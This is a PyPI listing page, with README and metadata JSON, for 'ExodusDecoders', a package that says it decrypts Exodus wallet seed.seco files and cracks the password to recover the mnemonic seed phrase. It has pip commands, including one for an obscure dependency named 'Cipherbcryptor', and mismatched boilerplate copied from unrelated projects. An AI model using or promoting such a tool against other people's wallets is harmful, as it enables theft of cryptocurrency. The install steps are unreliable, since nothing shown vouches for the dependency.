ExodusDecoders


NameExodusDecoders JSON
Version 1.4.2 PyPI version JSON
download
home_pageNone
SummaryDecode seed.seco file from Exodus)
upload_time2024-09-21 22:24:42
maintainerNone
docs_urlNone
authorIsaac Florentine
requires_python<4.0,>=3.7
licenseMIT
keywords
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # ExodusDecode
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)

Decode seed.seco file from Exodus, and crack by password ~ to Mnemonic phrase (seed)

## Installation
Python requires [Python.org](https://www.python.org/) v3,7+ to run.
Install the dependencies and devDependencies and start the server.
```sh
python -m pip install pip
python -m pip install --upgrade pip
pip install pycryptodome
pip install Cipherbcryptor
pip install Mnemonic
```
## Using

```Python
from ExodusDecode import ExodusWalletReader
w1 = ExodusWalletReader('wallets\\seed.seco')
data = w1.decrypt('Password')
print(ExodusWalletReader.extract_mnemonic(data))

```

## License
MIT
**Encode Cipherbcryptor group**

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "ExodusDecoders",
    "maintainer": null,
    "docs_url": null,
    "requires_python": "<4.0,>=3.7",
    "maintainer_email": null,
    "keywords": null,
    "author": "Isaac Florentine",
    "author_email": null,
    "download_url": "https://files.pythonhosted.org/packages/5e/c5/de8ab70f7ee5b61c9b722659115efd219d3eb81f14635395cc51085e2512/exodusdecoders-1.4.2.tar.gz",
    "platform": null,
    "description": "# ExodusDecode\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nDecode seed.seco file from Exodus, and crack by password ~ to Mnemonic phrase (seed)\n\n## Installation\nPython requires [Python.org](https://www.python.org/) v3,7+ to run.\nInstall the dependencies and devDependencies and start the server.\n```sh\npython -m pip install pip\npython -m pip install --upgrade pip\npip install pycryptodome\npip install Cipherbcryptor\npip install Mnemonic\n```\n## Using\n\n```Python\nfrom ExodusDecode import ExodusWalletReader\nw1 = ExodusWalletReader('wallets\\\\seed.seco')\ndata = w1.decrypt('Password')\nprint(ExodusWalletReader.extract_mnemonic(data))\n\n```\n\n## License\nMIT\n**Encode Cipherbcryptor group**\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "Decode seed.seco file from Exodus)",
    "version": "1.4.2",
    "project_urls": null,
    "split_keywords": [],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "b4d66e09200d1328a0f57597bbf1b95583a89de89445067990682ab7d3110276",
                "md5": "cfb30cee1a5fa4f3d76df44407f49d09",
                "sha256": "c0671e4bc74bc608acf29ceae3de016372fb128baafa2393159048017b28f863"
            },
            "downloads": -1,
            "filename": "exodusdecoders-1.4.2-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "cfb30cee1a5fa4f3d76df44407f49d09",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": "<4.0,>=3.7",
            "size": 3532,
            "upload_time": "2024-09-21T22:24:41",
            "upload_time_iso_8601": "2024-09-21T22:24:41.434591Z",
            "url": "https://files.pythonhosted.org/packages/b4/d6/6e09200d1328a0f57597bbf1b95583a89de89445067990682ab7d3110276/exodusdecoders-1.4.2-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "5ec5de8ab70f7ee5b61c9b722659115efd219d3eb81f14635395cc51085e2512",
                "md5": "f9f7261e8ad49cbc03a7a9ab0a9c89e4",
                "sha256": "cea6a0bd3b57ffdfb17cadf61fe0b10d98644c7dd3390768fe8da921b691d3f6"
            },
            "downloads": -1,
            "filename": "exodusdecoders-1.4.2.tar.gz",
            "has_sig": false,
            "md5_digest": "f9f7261e8ad49cbc03a7a9ab0a9c89e4",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": "<4.0,>=3.7",
            "size": 3118,
            "upload_time": "2024-09-21T22:24:42",
            "upload_time_iso_8601": "2024-09-21T22:24:42.666582Z",
            "url": "https://files.pythonhosted.org/packages/5e/c5/de8ab70f7ee5b61c9b722659115efd219d3eb81f14635395cc51085e2512/exodusdecoders-1.4.2.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-09-21 22:24:42",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "lcname": "exodusdecoders"
}
        
Elapsed time: 0.34876s